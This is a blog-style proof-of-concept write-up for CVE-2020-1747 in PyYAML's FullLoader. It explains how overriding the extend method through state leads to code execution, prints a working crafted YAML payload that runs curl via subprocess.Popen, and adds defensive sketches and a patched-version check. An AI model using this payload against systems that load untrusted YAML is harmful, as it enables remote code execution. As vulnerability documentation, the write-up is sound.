CVE-2020-1747 PyYAML PoC
tl;dr: a ready-to-go script is available at my Gist
Recently a vulnerability was discovered in Python’s PyYAML library that allows arbitrary code execution through YAML deserialization. The original issue report and NVD’s vulnerability description cover the details of the case, so below I’ll just outline how to actually make it work.
The commits and tests linked in the GitHub issue show that the construct_python_object_apply function in FullConstructor (used by FullLoader) can set a “state” property on the object it creates. That state comes from the input passed to FullLoader, and therefore from user-controlled data in the file being loaded. The state can carry attributes, which are likewise specified inside the loaded YAML file. The constructor, however, does not check whether the attributes passed in the state are private class attributes, nor whether an attribute conflicts with a preexisting extend method. As a result, those attributes and methods can be overridden.
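To make the missing check concrete, here is a minimal sketch of what validating state keys could look like. It is not taken from PyYAML’s source: the names FORBIDDEN_STATE_KEYS, check_state_keys and set_instance_state are hypothetical, and the deny-list simply mirrors the two cases named above (dunder-style attributes and the name extend).

```python
import re

# Hypothetical deny-list: dunder-style attributes and the name "extend".
FORBIDDEN_STATE_KEYS = re.compile(r"^extend$|^__.*__$")


def check_state_keys(state):
    """Raise ValueError if any key of the state mapping is on the deny-list."""
    for key in state:
        if FORBIDDEN_STATE_KEYS.match(str(key)):
            raise ValueError(f"blocked state key: {key!r}")


def set_instance_state(instance, state):
    """Validate the keys first, then merge the state into the instance."""
    check_state_keys(state)
    # Assumption: the object has no __setstate__, so the state ends up in __dict__.
    instance.__dict__.update(state)


if __name__ == "__main__":
    class Dummy:
        pass

    obj = Dummy()
    set_instance_state(obj, {"tag": "dummy", "value": "dummy"})
    print(obj.tag, obj.value)
    try:
        set_instance_state(obj, {"extend": print})
    except ValueError as exc:
        print(exc)
```

With a check like this in place, harmless keys such as tag and value still go through, while an attempt to set extend is rejected before it reaches the instance.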
The example below shows a crafted YAML file that makes an HTTP request with curl when loaded.
    - !!python/object/new:yaml.MappingNode
      listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1/rce"]]'
      state:
        tag: !!str dummy
        value: !!str dummy
        extend: !!python/name:yaml.unsafe_load
First we define the desired constructor, in this case PyYAML’s MappingNode, because the structure to be loaded is supposed to be a mapping (the other node types to choose from are scalar and sequence). Next, take a look at the state property: the tag and value attributes are mandatory, so we just pass arbitrary values for them. Then the extend attribute is specified. See how the extend method is used in the code of FullConstructor:
    def construct_python_object_apply(self, suffix, node, newobj=False):
        # ...
        # some code omitted here
        #
        instance = self.make_python_instance(suffix, node, args, kwds, newobj)
        if state:
            self.set_python_instance_state(instance, state)
        if listitems:
            instance.extend(listitems)
        if dictitems:
            for key in dictitems:
                instance[key] = dictitems[key]
        return instance
We see that the extend method of the “instance” object is called. Since the instance previously had its state set from our input, its extend method is now overridden with the yaml.unsafe_load function. The extend method receives the listitems variable as input, which we also control. In our case this is another small piece of PyYAML-structured data, which imports and runs subprocess.Popen. The data is cast to a string with !!str so that it can later be passed to unsafe_load as is. Otherwise PyYAML would try to make a Python object out of it.
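The mechanics can be reproduced without PyYAML at all. The sketch below is a simplified simulation, not the library’s code: FakeNode, fake_unsafe_load and apply_state_then_listitems are hypothetical stand-ins, and it assumes the state is merged straight into the instance’s __dict__. Nothing is deserialized or executed; the stand-in only reports what it was handed.

```python
class FakeNode:
    """Hypothetical stand-in for yaml.MappingNode; it defines no extend itself."""


def fake_unsafe_load(document):
    """Harmless stand-in for yaml.unsafe_load: only reports its argument."""
    return ("would deserialize", document)


def apply_state_then_listitems(cls, state, listitems):
    """Mimic the tail of construct_python_object_apply shown above."""
    # Create the object without calling __init__, as object/new does.
    instance = cls.__new__(cls)
    # Assumption: with no __setstate__, the state is merged into __dict__.
    instance.__dict__.update(state)
    # Same call as in the excerpt; the result is returned here only so that
    # the effect is observable (the original returns the instance instead).
    if listitems:
        return instance.extend(listitems)
    return None


inner_payload = '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1/rce"]]'
state = {"tag": "dummy", "value": "dummy", "extend": fake_unsafe_load}
result = apply_state_then_listitems(FakeNode, state, inner_payload)

if __name__ == "__main__":
    print(result)
```

Because the attribute named extend now lives on the instance, the call instance.extend(listitems) ends up in whatever callable the state supplied, with the nested YAML string as its only argument.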
This way we replaced the extend method with yaml.unsafe_load, which is known for its deserialization risks, and passed it a YAML payload nested inside the actual YAML file.
Thanks to ret2libc for discovering and reporting this problem. The vulnerability was fixed in PyYAML 5.3.1, which was made available on PyPI shortly after the issue was published, so thanks to the PyYAML team for that.
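If you want to check whether an environment already has the fixed release, a small version comparison is enough. The following is a rough sketch using only the standard library; parse_version, is_patched and installed_pyyaml_version are hypothetical helper names, and the parser deliberately ignores pre-release suffixes, so treat the result as a hint rather than an audit.

```python
import re
from importlib import metadata

FIXED_VERSION = (5, 3, 1)  # first fixed release, as stated above


def parse_version(version):
    """Turn '5.3.1' or '5.4b2' into a tuple of three ints (suffixes dropped)."""
    parts = []
    for chunk in version.split(".")[:3]:
        match = re.match(r"\d+", chunk)
        parts.append(int(match.group()) if match else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_patched(version):
    """Return True if the given version string is at least 5.3.1."""
    return parse_version(version) >= FIXED_VERSION


def installed_pyyaml_version():
    """Return the installed PyYAML version string, or None if not installed."""
    try:
        return metadata.version("PyYAML")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    found = installed_pyyaml_version()
    if found is None:
        print("PyYAML is not installed")
    else:
        status = "patched" if is_patched(found) else "vulnerable to CVE-2020-1747"
        print(f"PyYAML {found}: {status}")
```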